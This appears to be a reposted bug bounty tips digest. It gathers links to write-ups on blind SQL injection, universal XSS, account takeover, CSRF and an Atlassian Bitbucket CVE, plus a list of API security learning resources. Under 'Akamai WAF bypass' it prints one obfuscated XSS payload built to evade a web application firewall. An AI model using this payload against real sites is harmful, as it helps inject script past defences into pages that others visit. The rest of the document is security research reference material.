How I exploited Blind SQLi without using any tool!— StackZero
https://infosecwriteups.com/how-i-exploited-blind-sqli-without-using-any-tool-stackzero-396e831ecbdf?source=rss—-7b722bfd1b8d—4
6000+ Bug Reports(可参考思路,有些类型的洞现在不收了)
https://docs.google.com/spreadsheets/d/1mfj6InLiXaKvemRimH1wowP4UTe_HExemGajId_JRD8/edit
Common ways to get RCE
Akamai WAF bypass
x"><svg%250donload%3d"< span="">window%5B%27alert%27%5D(location[%27hostname%27])"Exploiting Web3’s Hidden Attack Surface: Universal XSS on Netlify’s Next.js Library
https://samcurry.net/universal-xss-on-netlifys-next-js-library/
Firing 8 Account Takeover Methods
https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050
Here’s 23 free ways to learn about API security testing
1. Video: Traceable AI, API Hacking 101.2. Video: Katie Paxton-Fear, API Hacking.3. Video: Bugcrowd, Bad API, hAPI Hackers.4. Video: OWASP API Security Top 10 Webinar.5. Blog: Detectify, How To Hack API's in 2021.6. Blog: HackXpert, Let's build an API to hack.7. Video: Bugcrowd, API Security 101 by Sadako.8. Video: David Bombal, Free API Hacking Course.9. Blog: Wallarm, How To Hack API In 60 Minutes.10. Website: APIsecurity IO, API Security Articles.11. Blog: Curity, The API Security Maturity Model.12. Blog: Expedited Security, API Security MegaGuide.13. Video: Grant Ongers, API Security Testing Workshop.14. Videos: The XSS Rat, API Testing And Securing Guide.15. Blog: APIsec OWASP API Security Top 10: A Deep Dive.16. Podcast: We Hack Purple, API Security Best Practices.17. Blog: Kontra Application Security, Owasp Top 10 for API.18. Blog: Secure Delivery, OWASP API Top 10 CTF Walk-through.19. Blog: SmartBear, How To Hack An API And Get Away With It.20. Blog: Ping Identity, API Security: The Complete Guide 2022.
21. Video: SANS Offensive Operations, Analyzing OWASP API Security.22. Blog: Bend Theory, Exploiting Unintended Functionality in API's.23. Blog: Bright Security, Complete Guide to Threats, Methods & Tools.
CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability
Facebook SMS Captcha Was Vulnerable to CSRF Attack , bounty $18,750
https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980
Bug hunter Methodology
群友有师傅遇到了同样问题,所以各位师傅以后跟锐服信这家公司打交道要留心:
https://mp.weixin.qq.com/s/DAjYO6MFaWapqTkVl-VyTA,点击 阅读原文 可看详情。为防止被和谐,图片存了一份。
原文始发于微信公众号(Bug Bounty Tips):Bug Bounty Tips(2022-10-19)
